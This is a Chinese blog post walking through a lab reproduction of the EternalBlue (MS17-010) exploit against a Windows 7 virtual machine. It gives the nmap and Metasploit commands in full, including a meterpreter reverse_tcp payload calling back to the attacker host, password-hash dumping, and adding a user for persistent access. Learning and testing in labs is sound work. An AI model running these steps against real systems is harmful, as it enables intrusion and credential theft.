永恒之蓝漏洞复现过程

最新推荐文章于 2024-05-20 14:15:00 发布
最新推荐文章于 2024-05-20 14:15:00 发布
阅读量648 收藏 5
点赞数
文章标签: 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hhf520lxg/article/details/116713178
版权

1.准备一台kali虚拟机,一台windows7
2.打开kali,查看kali的IP地址,命令:ifconfig
在这里插入图片描述

3.知道kali的IP地址为:192.168.43.116之后使用kali自带的nmap网络扫描工具扫描192.168.43.0网段下存活的主机,命令:nmap -sS 192.168.43.0/24
在这里插入图片描述

在这里我选择了IP地址为192.168.43.67的主机作为我的漏洞利用对象,因为我觉得他的主机端口开放的最多,成功的几率比较大,而且它的445端口也是开放的
4.接下来可以看看这个主机的操作系统,我用的命令是:nmap -O 192.168.43.67
在这里插入图片描述

这个主机的操作系统是windows 7|2008|8.1
我将利用永恒之蓝这个漏洞渗透windows7
5.在命令行中输入msfconsole 进入metasploit控制台
6.在命令行中输入search +你想要利用的有关漏洞。我在这里用的是:search blue
在这里插入图片描述

7.查到后,use 一个模块,选择auxiliary/scanner/smb/smb_ms17_010 (扫描命令)这个模块,目的是查看该主机是否存在ms17_010这个漏洞
命令:use auxiliary/scanner/smb/smb_ms17_010
查看这个模块需要设置什么参数,命令:show options
在这里插入图片描述

只关注RHOSTS(目标主机)和THREADS(线程默认是1)
命令:
set rhost 192.168.43.67
set threads 10
run
在这里插入图片描述

主机可能存在ms17_010漏洞,可以进行下一步动作了

8.知道存在ms17-010漏洞之后就可以实施攻击,攻击模块使用
use exploit/windows/smb/ms17_010_eternalblue
show options
设置目标主机:set rhost 192.168.43.67
search payload(可以搜索好几个关键次,这样更准确)搜索可以用的攻击载荷 payload是漏洞利用的时候做出的动作
设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
设置监听主机:set 192.168.43.116
利用exploit进行攻击:exploit
在这里插入图片描述

返回了一个session,可以在meterpreter命令行上输入:help即可查看可以对受害主机做些什么
在这里插入图片描述

(下面还有很多,只放了一页)
查看一下受害主机的信息
在这里插入图片描述

截取受害主机的屏幕
在这里插入图片描述

将截取的屏幕保存在根目录下
接下来就可以为所欲为了
Shell进入目标主机的shell,hashdump是查看当前主机的账户和密码,密码是加密的,但是没有关系。我们可以利用shell在建立一个新的用户,方便我们再次利用这个受害者主机
在这里插入图片描述

hhf小菜鸡
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝复现
xdjxi的博客
03-07 335
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.什么是SMB协议? SM...
永恒之蓝漏洞复现
m0_75178803的博客
06-11 416
(控制面板——编辑组——管理工具编辑组策略——本地计算机策略——计算机配置——windows设置——安全设置——本地策略——安全选项)终端输入nmap -sP 对在192.168.75.xxx网段下的所有电脑进行简单的ping扫描(不进行端口扫描)终端输入nmap -p,通过扫描端口,用端口的是否启用来获取靶机ip。创建新的管理员账户,账户名123,密码123(在shell控制台下)查看目标靶机的本地用户(在目标主机的shell控制台下)获取靶机的本地用户的密码(在meterpreter下)
【CNVD-2020-10487】记一次漏洞复现过程
Nil的博客
06-11 919
由于早期版本的Tomcat默认开启的AJP服务。端口号为8009,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web上的任意文件。漏洞编号。
一次历史漏洞分析与复现的全部过程
最新发布
qkh1234567的博客
05-20 673
可以看到文件名没有做安全处理,执行到 fos.write 时 shell.war 就被写入到 tomcat 的 webapps 目录了,这里的目录名不太对劲,因为是在 IDEA 启动 SpringBoot 进行调试的,无须在意,分析到这里就结束了。查看如何访问 sys_member_space.html,可以看到文件名被定义为常量,space 方法使用了该常量,也就是说访问路径的格式为 /space/{id} 时就能触发 XSS 了。我们试一下,发现响应 404 文件不存在,并且文件路径前加了 /jsp。
ms17-010(永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝漏洞复现(详细版)
Zqinglele的博客
03-20 2402
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝漏洞检测工具
10-10
永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,...
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
永恒之蓝(ms17-010)复现
weixin_74020633的博客
04-12 1034
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;利用辅助模块进行扫描,该模块不会直接在攻击机和靶机之间建立访问,只负责执行扫描,嗅探,指纹识别的相关功能,以辅助渗透测试。
永恒之蓝漏洞复现MS17-010
weixin_47193338的博客
05-05 1633
一、简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 二、原理 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,
从零开始学网安:Day3 体验跨网段渗透与后渗透经验分享
无业de小白的博客
05-07 393
这一次分享一些跨网段渗透与简单后渗透操作体验。可以当成两个独立的实验来看待。有尝试过两个合并完成,但由于winxp连接不稳定等因素,展示后渗透效果没有直接在win7上展示好。所以可以换一下实验流程,将winxp作为跳板,win7作为靶机效果更好。
永恒之蓝漏洞复现(ms17-010)
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之蓝 MS17-010漏洞复现
热门推荐
MX的博客
10-07 3万+
永恒之蓝 MS17-010漏洞复现 文章目录永恒之蓝 MS17-010漏洞复现一:漏洞原理1:简介2:漏洞原理代码详解二:漏洞复现1:信息收集 一:漏洞原理 1:简介 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无,S...
永恒之蓝(MS17-010) 漏洞复现
剁椒鱼头没剁椒的博客
06-10 1229
  永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
勒索病毒“WannaCry”之复现过程永恒之蓝
weixin_40950781的博客
08-09 6700
勒索病毒“WannaCry”复现永恒之蓝)1.漏洞简述2.漏洞复现2.1复现环境2.3复现过程2.3.3 开始攻击3.结语4.防范 1.漏洞简述 “永恒之蓝”利用Windows系统的SMB漏洞获取系统的最高权限,该工具通过恶意代码扫描开放445端口的Windows系统;被扫描到的Windows系统,只要开机上线,不要要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等...
简单漏洞复现_网络渗透测试
Radiency的博客
11-23 1566
利用easy file sharing server服务漏洞;远程控制目标,生成主控端、被控端,获得靶机控制权。
永恒之蓝漏洞复现流程
09-01
需要注意的是,复现永恒之蓝漏洞属于安全研究领域,只应在合法的环境下进行,并遵守相关法律法规。在实际环境中,应该始终保持系统和软件的更新,以免存在已知漏洞。<span class="em">1</span><span class="em">2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值